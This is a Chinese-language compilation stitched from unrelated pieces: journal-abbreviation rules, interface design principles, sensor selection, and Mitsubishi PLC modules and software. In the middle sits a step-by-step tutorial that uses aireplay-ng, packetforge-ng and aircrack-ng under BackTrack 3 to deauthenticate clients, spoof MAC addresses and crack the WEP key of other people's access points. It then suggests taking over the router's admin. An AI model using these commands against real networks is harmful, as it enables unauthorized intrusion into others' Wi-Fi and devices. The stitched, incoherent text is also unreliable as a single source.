英文单词缩写一般以辅音结尾，而不以元音结尾。如 American 省略为 Am, 而不省略为 Ame 或 Amer ， Medicine 或 Medical 缩写为 Med,European 缩写为 Eur 等。但 Science 例外，缩写为 Sci, 可能是因为元音 I 之后又是元音 E 的缘故。缩写刊名每个词首字母必须大写，而不可全部都用大写或小写 .

2 压缩字母法

仅个别单词采用压缩字母方式缩写，如 Japanese 缩写为 Jpn 而不是 Jan,National 应缩写为 Natl 而不是 Nat 等。经常有读者将 Japanese 写成 Jan 是参考文献著录中常见的错误。如 Japanese Journal of Ophthalmology ，应缩写为 Jpn J Ophthalmol,National Cancer Institute Research Report 缩写为 Natl Cancer Inst Res Rep. 而 Nat 是 Nature 和 Natural 的缩写，如 Nature Medicine,Nature biotechnology 分别缩写为 Nat Med,Nat Biotechnol. 另外 CN 是中国的国别代码，期刊缩写刊名中， ChinaChinese 不得缩写为 CN ，而应缩写为 Chin. 采用压缩写法是为了避免与其他常用缩写混淆。如 Japanese 不能缩写为 Jan, 可能是 Jan 是 January 的固定缩写形式， National 缩写为 Natl 而不缩写为 Nat, 可能是 Nat 是 Nature 和 Natural 的缩写。

3 学科名称缩写

刊名中学科名称缩写很常见，因而了解学科名缩写规则非常必要。凡以 -ogy 结尾的单词，一律将词尾 -ogy 去掉，如 Cardiology 缩写为 Cariol ， Biology 缩写为 Biol, 以 -ics 结尾的学科名词，缩写时将 -ics 或连同其前面若干字母略去。如 Physics, 缩写为 Phys, 以 -try 结尾的词，缩写时将 -try 连同前面若干字母略去。如 chemistry 缩写为 Chem, 其中也包括其他形容词的缩写。

4 刊名中常用词和特殊单词的缩写

期刊名中有些常用单词可以缩写为一个字母，如Journal缩写为J,Quarterly缩写为Q,Royal缩写为R,New缩写为N,South缩写为S等。

5 刊名首字母组合

有些杂志名称缩写采用首字母组合，而且已被固定下来，一般都是国际上有较大影响的期刊，并得到国际上众多索引性检索工具的认同。如The Journal of American Medical Association缩写为JAMA，British Medical Journal缩写为BMJ等。

6 国家名称的缩写

刊名中国家名称的缩写分为两种情况。如国家名称为单个词汇，缩写时常略去词尾或词的后部分若干字母。如American缩写为Am,British缩写为Br,Chinese缩写为Chin等。而国家名称由多个词组组成时，常取每个词的首字母，如United States of America缩写为USA或US。

7 虚词一律省略

有许多虚词，如the,of,for,and,on,from,to等，在缩写时均省去。如Journal of chemistry缩写为J chem, Archives of Medical Research缩写为 Arch Med Res.

人机界面（Human-Computer Interface,简写HCI，又称用户界面或使用者界面）：是人与计算机之间传递、交换信息的媒介和对话接口，是计算机系统的重要组成部分。它实现信 息的内部形式与人类可以接受形式之间的转换。凡参与人机信息交流的领域都存在着人机界面。
人机交互（Human-Computer Interaction, 简写HCI）：是研究关于设计、评价和实现供人们使用的交互计算系统以及有关这些现象进行研究的科学。
人机交互与人机界面是两个有着紧密联系而又不尽相同的概念。

人机界面设计的过程

人机界面的设计过程可分为以下几个步骤：
1 创建系统功能的外部模型设计模型主要是考虑软件的数据结构、总体结构和过程性描述，界面设计一般只作为附属品，只有对用户的情况(包括年龄、性别、心理情 况、文化程度、个性、种族背景等)有所了解，才能设计出有效的用户界面；根据终端用户对未来系统的假想(简称系统假想)设计用户模型，最终使之与系统实现 后得到的系统映象(系统的外部特征)相吻合，用户才能对系统感到满意并能有效的使用它；建立用户模型时要充分考虑系统假想给出的信息，系统映象必须准确地 反映系统的语法和语义信息。总之，只有了解用户、了解任务才能设计出好的人机界面。
2 确定为完成此系统功能人和计算机应分别完成的任务
任务分析有两种途径。一种是从实际出发，通过对原有处于手工或半手工状态下的应用系统的剖析，将其映射为在人机界面上执行的一组类似的任务；另一种是通过研究系统的需求规格说明，导出一组与用户模型和系统假想相协调的用户任务。
逐步求精和面向对象分析等技术同样适用于任务分析。逐步求精技术可把任务不断划分为子任务，直至对每个任务的要求都十分清楚；而采用面向对象分析技术可识别出与应用有关的所有客观的对象以及与对象关联的动作。
3 考虑界面设计中的典型问题
设 计任何一个机界面，一般必须考虑系统响应时间、用户求助机制、错误信息处理和命令方式四个方面。系统响应时间过长是交互式系统中用户抱怨最多的问题，除了 响应时间的绝对长短外，用户对不同命令在响应时间上的差别亦很在意，若过于悬殊用户将难以接受；用户求助机制宜采用集成式，避免叠加式系统导致用户求助某 项指南而不得不浏览大量无关信息；错误和警告信息必须选用用户明了、含义准确的术语描述，同时还应尽可能提供一些有关错误恢复的建议。此外，显示出错信息 时，若再辅以听觉(铃声)、视觉(专用颜色)刺激，则效果更佳；命令方式最好是菜单与键盘命令并存，供用户选用。
4 借助CASE工具构造界面原型，并真正实现设计模型软件模型一旦确定，即可构造一个软件原形，此时仅有用户界面部分，此原形交用户评审，根据反馈意见修改 后再交给用户评审，直至与用户模型和系统假想一致为止。一般可借助于用户界面工具箱(Userinterfacetoolkits)或用户界面开发系统 (Userinterfacedevelopmentsystems)提供的现成的模块或对象创建各种界面基本成分的工作。

设计界面的运用原则

1)合理性原则，即保证在系统设计基础上的合理与明确。　　任何的设计都既要有定性也要有定量的分析，是理性与感性思维相结合。努力减少非理性因素，而 以定量优化、提高为基础。设计不应人云亦云，一定要在正确、系统的事实和数据的基础上，进行严密地理论分析，能以理服人、以情感人。
2)动态性原则，即要有四维空间或五维空间的运作观念。一件作品不仅是二维的平面或三绝的立体，也要有时间与空间的变换，情感与思维认识的演变等多维因素。
3)多样化原则，即设计因素多样化考虑。当前越来越多的专业调查人员与公司出现，为设计带来丰富的资料和依据。但是，如何获取有效信息，如何分析设计信息实际上是一个要有创造性思维与方法的过程体系。
4)交互性原则，即界面设计强调交互过程。一方面是物的信息传达，另一方面是人的接受与反馈，对任何物的信息都能动地认识与把握。
5)共通性原则，即把握三类界面的协调统一，功能、情感、环境不能孤立而存在。

设计界面的应用方法

设计界面所包含的因素是极为广泛的，但在运用中却只能有侧重、有强调的把握。设计因素虽多，但它仍是一个不可分割的整体。它的结果是物化的形，但这个形却是代表了时代、民族等方面的意识，并最终反映出人的“美”的心理活动。

设计界面的运用，核心是设计分析。在一些国际性的大公司，如索尼、松下、柯尼卡等，都有许多的成功案例可为借鉴。如柯尼卡公司设计其相机时，首先不是去 绘制“美”的形和考虑技术的进步，而是进行对象人的日常行为分析，作出故事版(STORY)。它先假定对象人的年龄为35岁，名:Xxxx，从而分析他的 家庭、喜好与憎恶，分析他的日常行为，进而考察其人在什么场合需要僚机，从而为设计提供概念(CONCEPT)与目标(TARGET)，进行设计。

另一方面，设计师自身对社会环境也要进行深入的认识与考察，对设计的作品取向有明晰的认识:是否符合人们的消费预期?是否能感受到人们的审美知觉?日本 设计师佐野邦雄先生曾作一图——生活的变迁与设计师的课题，将日本及世界上某些非常有影响性的事件，如技术的进步、企业的发展等等都进行了归纳，进而对设 计有了深入的认识与感悟。

所以，要运用好设计的界面，理性的认识是首要的，其次就是创造性的，而且是有实效性的分析、处理信息。设计不是一成不变的，分析方法也不是一成不变的，设计的界面同样是在人一物的信息交流中变化发展的。

人机界面的使用方法

1.明确监控任务要求，选择适合的HMI产品；
2.在PC机上用画面组态软件编辑“工程文件”；
3.测试并保存已编辑好的“工程文件” ；
4.PC机连接HMI硬件，下载“工程文件”到HMI中；
5.连接HMI和工业控制器（如PLC、仪表等），实现人机交互。

要进行—个具体的测量工作，首先要考虑采用何种原理的传感器，这需要分析多方面的因素之后才能确定。因为，即使是测量同一物理量，也有多种原理的传感器可 供选用，哪一种原理的传感器更为合适，则需要根据被测量的特点和传感器的使用条件考虑以下一些具体问题：量程的大小；被测位置对传感器体积的要求；测量方 式为接触式还是非接触式；信号的引出方法，有线或是非接触测量；传感器的来源，国产还是进口，价格能否承受，还是自行研制。
在考虑上述问题之后就能确定选用何种类型的传感器，然后再考虑传感器的具体性能指标。

2、灵敏度的选择

通常，在传感器的线性范围内，希望传感器的灵敏度越高越好。因为只有灵敏度高时，与被测量变化对应的输出信号的值才比较大，有利于信号处理。但要注意的 是，传感器的灵敏度高，与被测量无关的外界噪声也容易混入，也会被放大系统放大，影响测量精度。因此，要求传感器本身应具有较高的信噪比，尽员减少从外界 引入的厂扰信号。
传感器的灵敏度是有方向性的。当被测量是单向量，而且对其方向性要求较高，则应选择其它方向灵敏度小的传感器；如果被测量是多维向量，则要求传感器的交叉灵敏度越小越好。

3、频率响应特性

传感器的频率响应特性决定了被测量的频率范围，必须在允许频率范围内保持不失真的测量条件，实际上传感器的响应总有—定延迟，希望延迟时间越短越好。
传感器的频率响应高，可测的信号频率范围就宽，而由于受到结构特性的影响，机械系统的惯性较大，因有频率低的传感器可测信号的频率较低。
在动态测量中，应根据信号的特点(稳态、瞬态、随机等)响应特性，以免产生过火的误差。

4、线性范围

传感器的线形范围是指输出与输入成正比的范围。以理论上讲，在此范围内，灵敏度保持定值。传感器的线性范围越宽，则其量程越大，并且能保证一定的测量精度。在选择传感器时，当传感器的种类确定以后首先要看其量程是否满足要求。
但实际上，任何传感器都不能保证绝对的线性，其线性度也是相对的。当所要求测量精度比较低时，在一定的范围内，可将非线性误差较小的传感器近似看作线性的，这会给测量带来极大的方便。

5、稳定性

传感器使用一段时间后，其性能保持不变化的能力称为稳定性。影响传感器长期稳定性的因素除传感器本身结构外，主要是传感器的使用环境。因此，要使传感器具有良好的稳定性，传感器必须要有较强的环境适应能力。
在选择传感器之前，应对其使用环境进行调查，并根据具体的使用环境选择合适的传感器，或采取适当的措施，减小环境的影响。
传感器的稳定性有定量指标，在超过使用期后，在使用前应重新进行标定，以确定传感器的性能是否发生变化。
在某些要求传感器能长期使用而又不能轻易更换或标定的场合，所选用的传感器稳定性要求更严格，要能够经受住长时间的考验。

6、精度

精度是传感器的一个重要的性能指标，它是关系到整个测量系统测量精度的一个重要环节。传感器的精度越高，其价格越昂贵，因此，传感器的精度只要满足整个测 量系统的精度要求就可以，不必选得过高。这样就可以在满足同一测量目的的诸多传感器中选择比较便宜和简单的传感器。
如果测量目的是定性分析的，选用重复精度高的传感器即可，不宜选用绝对量值精度高的；如果是为了定量分析，必须获得精确的测量值，就需选用精度等级能满足要求的传感器。
对某些特殊使用场合，无法选到合适的传感器，则需自行设计制造传感器。自制传感器的性能应满足使用要求。

图3-1 定位控制模块

在 位置控制系统中常会采用伺服电机和步进电机作为驱动装置。即可采用开环控制，也可采用闭环控制。对于步进电机，我们可以采用调节发送脉冲的速度改变机械的 工作速度。使用FX系列PLC，通过脉冲输出形式的定位单元或模块，即可实现一点或多点的定位。下面介绍FX2N系列的脉冲输出模块和定位控制模块。

（1） 脉冲输出模块FX2N-1PG FX2N-1PG脉冲发生器单元可以完成一个对独立轴的定位，这是通过向伺服或步进马达的驱动放大器提供指定数量的脉冲来实现的。FX2N-1PG只用于 FX2N子系列，用FROM/TO指令设定各种参数，读出定位值和运行速度。该模块占用8个I/O点。输出最高为100KHZ的脉冲串。

（2）定位控制器FX2N-10GM FX2N-10GM为脉冲序列输出单元，它是单轴定位单元，不仅能处理单速定位和中断定位，而且能处理复杂的控制。如多速操作。FX2N-10GM最多可有8个连接在FX2N系列PLC上。最大输出脉冲为200KHZ。

（3） 定位控制器FX2N-20GM 一个FX2N-20GM可控制两个轴。可执行直线插补、圆弧插补或独立的两轴定位控制，最大输出脉冲串为200KHZ（在插补期间，最大为 100KHZ）。FX2N-10GM、FX2N-20GM均具用流程图的编程软件可使程序的开发具有可视性。

（4）可编程凸轮开关 FX2N-1RM-E-SET 在机械传动控制中经常要对角位置检测。在不同的角度位置时发出不同的导通、关断信号。过去采用机械凸轮开关。机械式开关虽精度高但易磨损。FX2N- 1RM-SET可编程凸轮开关可用来取代机械凸轮开关实现高精度角度位置检测。配套的转角传感器电缆长度最长可达100m。应用时与其他可编程凸轮开关主 体、无刷分解器等一起可进行高精度的动作角度设定和监控，其内部有EEPROM，无需电池。可储存8种不同的程序。FX2N-1RM-SET可接在 FX2N上，也可单独使用。FX2N最多可接3块。它在程序中占用PLC8个I/O点 。

Aireplay-ng 的 6 种攻击模式详解

-0    Deautenticate 冲突模式  
使已经连接的合法客户端强制断开与路由端的连接，使其重新连接。在重新连接过程中获得验证数据包，
从而产生有效 ARP request。 如果一个客户端连在路由端上，但是没有人上网以产生有效数据，此时，
即使用-3  也无法产生有效 ARP request。所以此时需要用-0  攻击模式配合，-3 攻击才会被立刻激活。
aireplay-ng -0 10 –a <ap mac> -c <my mac> wifi0  
参数说明：
【-0】：冲突攻击模式，后面跟发送次数（设置为 0，则为循环攻击，不停的断开连接，客户端无法正常上网）
【-a】：设置 ap 的 mac
【-c】：设置已连接的合法客户端的 mac。如果不设置-c，则断开所有和 ap 连接的合法客户端。
aireplay-ng -3 -b <ap mac> -h <my mac> wifi0
注：使用此攻击模式的前提是必须有通过认证的合法的客户端连接到路由器

-1 fakeauth count  伪装客户端连接
这种模式是伪装一个客户端和 AP 进行连接。
这步是无客户端的研究学习的第一步，因为是无合法连接的客户端，因此需要一个伪装客户端来和路由器相连。
为让 AP 接受数据包，必须使自己的网卡和 AP 关联。如果没有关联的话，目标 AP 将忽略所有从你网卡发
送的数据包，IVS 数据将不会产生。用-1 伪装客户端成功连接以后才能发送注入命令，让路由器接受到注
入命令后才可反馈数据从而产生 ARP 包。
aireplay-ng -1 0 –e <ap essid> -a <ap mac> -h <my mac> wifi0
参数说明：
【-1】：伪装客户端连接模式，后面跟延时
【-e】：设置 ap 的 essid
【-a】：设置 ap 的 mac
【-h】：设置伪装客户端的网卡 MAC（即自己网卡 mac）

-2 Interactive 交互模式  
这种攻击模式是一个抓包和提数据发攻击包，三种集合一起的模式
1．这种模式主要用于研究学习无客户端，先用-1 建立虚假客户端连接然后直接发包攻击
aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b <ap mac> -h <my mac> wifi0
参数说明：
【-2】：交互攻击模式
【-p】：设置控制帧中包含的信息（16 进制），默认采用 0841
【-c】：设置目标 mac 地址
【-b】：设置 ap 的 mac 地址
【-h】：设置伪装客户端的网卡 MAC（即自己网卡 mac）
2．提取包，发送注入数据包
aireplay-ng -2  –r <file> -x 1024 wifi0  
发包攻击.其中，-x 1024  是限定发包速度，避免网卡死机，可以选择 1024。
                                                                                                                            
-3 ARP-request 注入攻击模式
这种模式是一种抓包后分析重发的过程
这种攻击模式很有效。既可以利用合法客户端，也可以配合-1  利用虚拟连接的伪装客户端。如果有合法客
户端那一般需要等几分钟，让合法客户端和 ap 之间通信，少量数据就可产生有效 ARP  request 才可利用-3
模式注入成功。如果没有任何通信存在，不能得到 ARP request.，则这种攻击就会失败。如果合法客户端和
ap 之间长时间内没有 ARP request，可以尝试同时使用-0  攻击。
如果没有合法客户端，则可以利用-1  建立虚拟连接的伪装客户端，连接过程中获得验证数据包，从而产生
有效 ARP request。再通过-3 模式注入。
aireplay-ng -3 -b <ap mac> -h <my mac> -x 512 wifi0
参数说明：
【-3】：arp 注入攻击模式
【-b】：设置 ap 的 mac
【-h】：设置
【-x】：定义每秒发送数据户包的数量，但是最高不超过 1024，建议使用 512（也可不定义）

-4 Chopchop 攻击模式，用以获得一个包含密钥数据的 xor 文件
这种模式主要是获得一个可利用包含密钥数据的 xor  文件，不能用来解密数据包。而是用它来产生一个新
的数据包以便我们可以进行注入。
aireplay-ng -4 -b <ap mac> -h <my mac> wifi0    
参数说明：
【-b】：设置需要研究学习的 AP 的 mac
【-h】：设置虚拟伪装连接的 mac（即自己网卡的 mac）

-5 fragment 碎片包攻击模式  用以获得 PRGA(包含密钥的后缀为 xor 的文件)
这种模式主要是获得一个可利用 PRGA，这里的 PRGA 并不是 wep  key 数据，不能用来解密数据包。而是
用它来产生一个新的数据包以便我们可以进行注入。其工作原理就是使目标 AP 重新广播包，当 AP 重广播
时，一个新的 IVS 将产生，我们就是利用这个来研究学习
aireplay-ng    -5 -b <ap mac> -h <my mac> wifi0    
【-5】：碎片包攻击模式
【-b】：设置 ap 的 mac
【-h】：设置虚拟伪装连接的 mac（即自己网卡的 mac）
Packetforge-ng：数据包制造程序
Packetforge-ng <mode> <options>
Mode
【-0】：伪造 ARP 包
packetforge-ng  -0  -a  <ap  mac>  -h  <my  mac>  wifi0  –k  255.255.255.255  -l  255.255.255.255
–y<.xor file> -w mrarp 参数说明：
【-0】：伪装 arp 数据包
【-a】：设置 ap 的 mac
【-h】设置虚拟伪装连接的 mac（即自己的 mac）
【-k】<ip[:port]>说明：设置目标文件 IP 和端口
【-l】<ip[:port]>说明：设置源文件 IP 和端口
【-y】<file>说明：从 xor 文件中读取 PRGA。后面跟 xor 的文件名。
【-w】设置伪装的 arp 包的文件名

Aircrack-ng：WEP  及  WPA-PSK key  研究学习主程序
Aircrack-ng [optin] <.cap/.ivs file>
Optin
aircrack-ng -n 64 -b <ap mac> name-01.ivs
参数说明：
【-n】：设置 WEP KEY  长度（64/128/152/256/512）
aircrack-ng -x -f 2 name-01h.cap
参数说明：
【-x】：设置为暴力研究学习模式
【-f】：设置复杂程度，wep 密码设置为 1，wpa 密码设置为 2  
aircrack-ng -w password.txt ciw.cap
【-w】：设置为字典研究学习模式，后面跟字典文件，再后面跟是我们即时保存的那个捕获到 WPA 验证的抓包文件。

首先
到这个地方确认你的电脑无线网卡可以抓包，目前市上最好的设备就是无线卡王了，功率超强。
然后开始下载你需要的BT3版本：
如果随便玩玩，或者是台式机，可以下载CD版的那个，因为启动一次时间不短。
如果是笔记本，硬盘又大，可以下载 USB版的那个。

下载完以后，可以装到一个可以启动的U盘里面，或者直接保存到硬盘上，下面介绍如何用硬盘直接启动BT3 Backtrack 3 。

如何制作BT3启动盘

光盘版的，刻录完就好了，不提了。

USB版的， 随便解压缩到某个U盘的根目录，这样，根目录下有 BT3和Boot两个文件夹。
打开一个DOS窗口， 指向你的U盘目录，比如是H盘，那么
———运行———
H: +回车
cd boot
bootinst.bat

按提示，确认你的确是在你的U盘的目录下操作。然后OK了。

重启时插入U盘即可启动，如果有任何问题，请确认你的电脑打开了U盘启动，并且被放在第一启动项（ThinkPad可以指定排除某个启动项的，请检查）
或者在启动时按住F12， 选择 U盘启动。

如果是硬盘启动，虽然有很多办法，但是为了VISTA和XP的兼容，个人推荐 DOS启动法，即先弄一个DOS的启动，比如弄一个MouseDOS一类的，傻瓜安装，可以让电脑启动进入纯DOS状态，然后在DOS情况下，进入硬盘上解压出的那个Boot目录里面，里面有个DOS 目录，然后执行BT3.bat 即可。
建议在执行BT3.bat前，先运行一下 Smartdrv.exe ,可以加快启动速度很多。（附件里有 Smartdrv.exe 98版）
小提示：DOS下的启动，不会自动进入图形界面，可以通过编辑 DOS目录里面的 CONFIG文件来实现：
只需要在CONFIG里面，最后加上一句：
autoexec=xconf;kdm
就可以了。
我顺便修改了MouseDOS的 Autoexec.bat文件，直接加上：
smartdrv.exe
D:
cd boot
cd dos
bt3.bat

这样启动直接进入了图形界面。
这时候的BT3，是全部在内存里的，也就是说，在系统内，任何对桌面和配置的改动都不会被记录，所以如果要记录文档，请不要放在桌面上。

使用BT3破解WEP密码过程

以下是破解过程
WEP 破解步骤
1) ifconfig -a
2) airmon-ng start wifi0 6
3) airodump-ng –ivs -w name -c 6 ath1
4) aireplay-ng -1 0 -e ap_essid -a ap_mac -h XXXXXXXXXX ath1 -1 is -one
5) aireplay-ng -5 -b ap_mac -h XXXXXXXXXX ath1
6) packetforge-ng -0 -a ap_mac -h XXXXXXXXXX -k 255.255.255.255 -l 255.255.255.255 -y fragment-XXXXX-XXXXXX.xor -w mrarp
7) aireplay-ng -2 -r mrarp -x 1024 ath1
aircrack-ng -n 64 -b ap_mac name-01.ivs

以下是破解命令的解释：（运行这些命令都需要打开终端窗口，可以使用Ctrl+C 从文本文件Copy， 然后 Shift+Insert 粘贴入终端窗口）
1）ifconfig -a
这个命令用于找到自己的无线网卡的 Mac地址。请记录下来备用。

2) airmon-ng start wifi0 6
这个命令用于将自己的无线网卡置于Monitor 模式，即类似一个AP的效果，因此可以有抓别人包的功能。
其中 wifi0 是我电脑里面给无线网卡的 ，一般应该都是这个，第一个ifconfig -a命令可以看得到。
wifi0 后面的那个6 ，是需要破解的AP的频道，如果不知道，可以在事前左下角开始菜单里面，找到 第二项 Internet 下面的倒数第二个画着 无线网的一个工具，用它可以看到那些需要破解的AP的频道（Channel）。

运行命令成功以后，你会看到返回的提示显示出现一个 Ath1（如果你是 Athoes的无线网卡的话就是这个，其他的可能不同，不过一般都是XXX1这样）
这个就是你的用于破解的网卡代号

这个命令，简而言之，就是把你的无线网卡置于监控模式，并且指定监控的频道。
如果你发现弄错了频道，那么没关系，重新运行一遍就可以了，不过这个时候，可能就会变成 Ath2…Ath3 等等，但是好像最多运行三次，然后就会失败。

3) airodump-ng –ivs -w name -c 6 ath1
这个命令比较关键，你运行以后，就会列出所有该频道的AP。

其中，6 是指你需要监控的频道，必须和第二个命令里的一样， ath1是刚才第二步出现的别名。
这个命令运行以后，显示的内容比较多，简单介绍一下：
BSSID : 其实就是AP的Mac 地址
PWR： AP信号的大小，一般，低于10，就比较麻烦了，丢包情况严重，比较难破解
RXQ： 干扰的大小
Beacons：发送接受的包，参考信息，在跳说明有数据
#Data： 这个比较重要，是接受到可以用来破解的特殊包，如果一直不变，那么，说明没有客户端连接，破解可能很麻烦，如果对方有大文件在下载，那么这个跳的速度非常快，10来分钟就可以有足够的包来破解了，如果跳得很慢，那么，就需要用一些特殊的方式来破解了。
CH：频道
MB：网络连接速度 54就是54MB
ENC， CIPHER，AUTH
这些是加密方式，我们这次只讨论显示为 WEP 和 WEP+ OPN的
如果显示 WPA TKIP 啥的，只能密码穷举破解，个人认为希望不大。
ESSID： 这个是AP的名字，需要用到的。如果是中文貌似会出问题。因此为了阻挡别人破解，可以用中文的ESSID

过一会儿，下面会显示哪些客户端连接到了哪些AP，针对有些Mac地址加密的，很容易模拟对方客户端的Mac从而骗进去，所以不要简单地相信Mac限制功能。

这个窗口就开着好了，不用关闭，以后的命令，需要重新打开一个终端窗口操作。

4）aireplay-ng -1 0 -e ap_essid -a ap_mac -h XXXXXXXXXX ath1
这一步开始，我们要做一些真正的破解工作，主要是针对那些客户端仅仅连接，没什么流量的AP，这种AP，#Data的增长非常慢，往往需要很长的时间才有可能取得足够的包（一般5位的密码需要10000个包左右，更多的密码就要更多的。。。。）这个时候就需要 aireplay-ng 出面了，顾名思义，这个软件就是 Replay，也就是说，模拟发包。

首先解释命令：
-e ap_essid 就是 -e 之后加上你需要破解的essid ，比如 TP-LINK ， linksys 啥的，注意大小写。
-a ap_mac 就是 -a 之后加上你需要破解的AP的Mac地址，第三步BSSID就可以看得到。不需要 ：哦。
-h XXXXXXXXXX 就是 -h 之后，加上你的无线网卡的 Mac地址， 在第一步你可以得到。
ath1 ，上面解释过了。
一个样板例子：
aireplay-ng -1 0 -e TP-LINK -a 001900123456 -h 001900345678 ath1

这里有个小的建议，大家可以把以上的命令，都记录在一个文件里，然后把里面的XXXXXXXX都用自己的网卡Mac地址替换掉，这样就不需要每次都输入自己的Mac地址了。每次都可以用Copy Paste的方式来输入，这样可以有效防止什么1 和 l ， O和0 的混淆。

这一条命令，是用欺骗的方式，连接上那个AP，因此，如果网络信号不好，可能会执行不成功。
如果成功了，那么会显示Successful :> 字样。否则，请让信号强度大于10。

5）aireplay-ng -5 -b ap_mac -h XXXXXXXXXX ath1
上一条成功以后，我们需要开始收集那些需要的数据包，才能够进行模拟，并且破解。
所谓的需要的数据包，就是 #Data的数据，如果 #Data一直是0，那么可能会很麻烦，最好的情况是 #Data缓慢增长的这种情况。

解释一下
-b ap_mac 就是你需要破解的AP的Mac 地址，从第三步那里的 BSSID可以找得到。
-h XXXXXXXXXX 就是你自己网卡的Mac地址。
Ath1 和上面一样

这一条命令的执行，和#data包有关，如果#Data 没有增加，则这个命令会一直执行，直到捕获一个#Data包。
捕获以后，程序会问你是否需要用这个包来模拟攻击。回答Y即可。
如果攻击成功，则会显示成功，失败往往是因为信号太差造成的， 如果攻击失败（往往是捕获的包有问题），程序重试N次以后，或自动重新开始捕捉包，继续进行即可。

等成功完成以后，会显示一个文件名：fragment-XXXXX-XXXXXX.xor
这个文件名，XXXXX里面是数字，是一个文件。马上会用得到。

这一步是最有可能失败的一步，尽量保持信号好一点。

6) packetforge-ng -0 -a ap_mac -h XXXXXXXXXX -k 255.255.255.255 -l 255.255.255.255 -y fragment-XXXXX-XXXXXX.xor -w mrarp

第六步，参数比较多，解释一下：
-a ap_mac 是待破解的AP的Mac地址，
-h XXXXXXXXX 是你自己的无线网卡Mac地址
fragment-XXXXX-XXXXXX.xor 就是第五步显示的那个文件名。
这一步会很快做完， 显示生成文件到 mrarp啥的，其实就是破解包的准备过程。

7) aireplay-ng -2 -r mrarp -x 1024 ath1
这一步没哈可以修改的，参数解释一下
ath1 是 你的无线网卡的名字
1024 是攻击速度，1024是最大值了，如果你的无线网卡不是MiniPCI的，个人建议设为 512 ，这样不容易死机。

当这一步开始执行，你会看到 第一个终端窗口里面，你破解的那个AP后面的 #Data在飞速增长，一般是 200个/s的速度，我们只需等待即可

8）我们可以新打开一个终端窗口，当 #Data达到 10000个的时候，就可以测试破解了，很多密码都可以 10000左右#Data就算出来
新窗口中运行：
aircrack-ng -n 64 -b ap_mac name-01.ivs
解释一下，
-b ap_mac 对方AP的Mac地址
name-01.ivs 其实是第三步自动生成的一个文件， 如果你多次运行了第三步，那么，可能会生成多个 name-XX.ivs文件， 你可以到对应的文件夹里看一下（就在桌面上的第一个文件夹图标里），找到XX最大的那个，就是你当前正在使用的这个文件。

运行以后，如果运气好，一会儿就会显示破解出来的密码，同时会显示 对应的Assic码，如果不是标准Assic码，就是一串数字，记录下来，搞掂。
运气不好的情况，这个程序会继续等待更多的#Data，等到了，就会重新计算一次密码。

小结一下：
本教程只针对 WEP 密码的破解教材，最好有得到认证的客户端连接在这个AP上，如果没有，有些AP（比如TP-LINK）能够被破解，某些可能就无法破解。联入网络以后，你可以管理他的AP，进行一些优化，往往AP的密码，可能就是WEP的密码。

FXGP-WIN-C:
三菱FX系列PLC编程软件(不含FX3U),支持梯形图、指令表、SFC语言编程,可进行程序的在线更改、监控及调试，具有异地读写PLC程序功能。

GX Developer:
三菱全系列PLC编程软件,支持梯形图、指令表、SFC、ST及FB、Label语言编程，网络参数设定，可进行程序的在线更改、监控及调试，结构化程序的编写(分部编程)，可制作成标准化程序, 在其它同类系统中使用。

GX Simulator:
三菱PLC的仿真调试软件，支持三菱所有型号PLC(FX,AnU,QnA和Q系列)，模拟外部I/O信号，设定软件状态与数值。

GX Explorer:
三菱全系列PLC维护工具,提供PLC维护必要的功能。类Windows操作，通过拖动进行程序的上传/下载，可以同时打开几个窗口监控多CPU系统的数据，配合GX RemoteService-I 使用因特网维护功能.

GX RemoteService I :
三菱全系列PLC远程访问工具，安装在服务器上，通过因特网/局域网连接PLC和客户。将PLC的状态发EMAIL给手机或计算机，可以通过因特网浏览器对软元件进行监控/测试。在客户机上，可使用GX Explorer软件通过因特网/局域网进入PLC。

GX Configurator-CC:
A系列专用，cclink单元的设定，监控工具。用于A 系列CC-Link主站模块的CC-Link网络参数设定,无需再编制顺控程序来设定参数，在软件图形输入屏幕中简单设定。可以监控, 测试和诊断CC-Link 站的状态 (主站/其它站) ，可以设置 AJ65BT-R2的缓存寄存器

GX Configurator-AD:
Q系列专用，A/D转换单元的设定，监控工具。用于设置Q64AD、Q68ADV 和Q68ADI模数转换模块的初始化数据和自动刷新数据，不用编制顺控程序即可实现A/D模块的初始化功能。

GX Configurator-DA:
Q系列专用，D/A转换单元的设定，监控工具。用于设置Q62DA、Q64DA、 Q68DAV和Q68DAI 数模转换模块的初始化及自动刷新数据。不用编制顺控程序即可实现D/A模块的初始化功能。

GX Configurator-SC:
Q系列专用，串行通信单元的设定，监控工具。用于设置串行通信模块QJ71C24(N)、QJ71C24(N)-R2(R4)的条件数据。不用顺控程序即可实现1.传送控制，2.MC 协议通讯，3.无协议通讯，4.交互协议通讯，5.PLC 监视功能，6.调制解调器设置参数设定。

GX Configurator-CT:
Q系列专用，高速计数器单元的设定，监控工具。用于设置QD62 、QD62E 或QD62D 高速计数模块的初始化数据和自动刷新数据，不用编制顺控程序即可实现初始化功能。

GX Configurator-PT:
Q系列专用，QD70单元的设定，监控工具。用来设定QD70P4 或QD70P8 定位模块的初始化数据。省去了用于初始化数据设定的顺控程序，便于检查设置状态和运行状态。

GX Configurator-QP:
Q系列专用，QD75P/DM用定位单元设定，监控工具。可对QD75□□进行各种参数、定位数据设置、监视控制状态并执行运行测试。进行（离线）预设定位数据基础上的模拟和对调试和维护有用的监视功能，即以时序图形式表示定位模块I/O信号、外部I/O信号和缓冲存储器状态的采样监视。

GX Configurator-TI:
Q系列专用，温度输入器单元的设定，监控工具。用于设置Q64TD 或Q64RD 温度输入模块的初始化数据和自动刷新数据，不用编制顺控程序即可实现初始化功能。

GX Configurator-TC:
Q系列专用，温度调节器单元设定，监控工具。用于设置Q64TCTT、Q64TCTTBW、Q64TCRT 或Q64TCRTBW 温度控制模块的初始化数据和自动刷新数据。

GX Configurator-AS:
Q系列专用，AS-I主控单元的设定，监控工具。用于设置AS-i主模块QJ71AS92自动读出/写入的通信数据、CPU软元件存储的自动刷新设置、配置数据的注册/EEPROM保存等的软件工具。

GX Configurator-DP:
MELSEC-PLC系列专用，Profibus-DP模块的设定，监控工具。用于设置Profibus-DP主站模块QJ71PB92D和A(1S)J71PB92D网络参数（包括主站参数设定、总线参数设定、从站设定等）的软件工具。使用QJ71PB92D时可以实现自动刷新功能，可以通过网络在线远程登入模块。

GX Configurator-MB
MELSEC-PLC系列QJ71MB91,QJ71MT91等MODUBUS模块软件。

GX Converter:
